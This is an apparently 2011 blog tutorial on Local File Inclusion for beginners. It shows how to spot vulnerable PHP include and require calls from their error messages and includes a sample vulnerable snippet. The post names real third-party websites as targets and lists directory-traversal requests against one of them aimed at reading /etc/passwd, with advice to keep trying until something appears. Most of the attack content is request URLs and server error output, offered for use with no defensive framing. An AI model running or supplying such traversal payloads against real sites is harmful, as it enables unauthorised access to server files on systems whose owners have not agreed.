border: 1px solid #d2d2d2; padding: 0px 8px 0px 8px; color: #a19999; font-size: 12px; height: 25px; width: 165px; border-radius: 5px; -moz-border-radius: 5px; -webkit-border-radius: 5px; margin:0px; } .submitbutton{ background:#F66303; border: 1px solid #F66303; text-shadow: 1px 1px 1px #333; box-shadow: 3px 3px 3px #666; font:bold 12px Arial, sans-serif; color: #fff; height: 25px; padding: 0 12px 0 12px; margin: 0 0 0 5px; border-radius: 5px; -moz-border-radius: 5px; -webkit-border-radius: 5px; cursor:pointer;}

Receive all updates via Facebook. Just Click the Like Button Below

You can also receive Free Email Updates:

Powered By Blogger Widgets

Related Posts Plugin for WordPress, Blogger...

Sunday, May 29, 2011

Local File Inclusion (LFI) For Beginners – Tutorial


What is LFI ?
Local File Inclusion (LFI) is when you have the ability to browse through the server by means of directory transversal. One of the most common uses of LFI is to discover the /etc/passwd file. This file contains the user information of a Linux system.
How to Find LFI Vulnerability ?
Example
http://www.site.com/index.php?p=..
Real World Examples:
http://www.jedit.org/index.php?page=..
Warning: main(…html): failed to open stream: No such file or directory in /home/groups/j/je/jedit/htdocs/index.php on line
63
Warning: main(): Failed opening ‘…html’ for inclusion (include_path=’.:/usr/local/share/pear’) in /home/groups/j/je/jedit/htdocs/index.
php on line 63
This is not Vulnerable,
A Vulnerable should look like
Warning: include() [function.include]: Failed opening ‘…php’ for inclusion (include_path=’.:/usr/share/pear’) in /
home/shiner/shiner.com/htdocs/beers/beers-home.php on line 62
include is the code , the script is using for example
<?php
$page = $_GET[page];
include($page);
?>
Should be [function.include]
but
<?php
$page = $_GET[page];
require_once($page);
?>
should be [function.require_once] or [function.require]
[- Find Example (Real) -]
http://www.crew4sea.com/indexm.php?url=..
Gives us.
Fatal error: require_once() [function.require]: Failed opening required ‘./..’ (include_path=’.:/:/usr/php/pear’
) in /indexm.php on line 164
[function.require]
So we know it Vulnerable
if Windows OS, you can just do
http://www.crew4sea.com/indexm.php?url=indexm.php
Other try
http://www.crew4sea.com/indexm.php?url=/etc/passwd
http://www.crew4sea.com/indexm.php?url=/etc/passwd
http://www.crew4sea.com/indexm.php?url=../etc/passwd
http://www.crew4sea.com/indexm.php?url=../etc/passwd
Until you get Something.

No comments:

Post a Comment

Share

Twitter Delicious Facebook Digg Stumbleupon Favorites More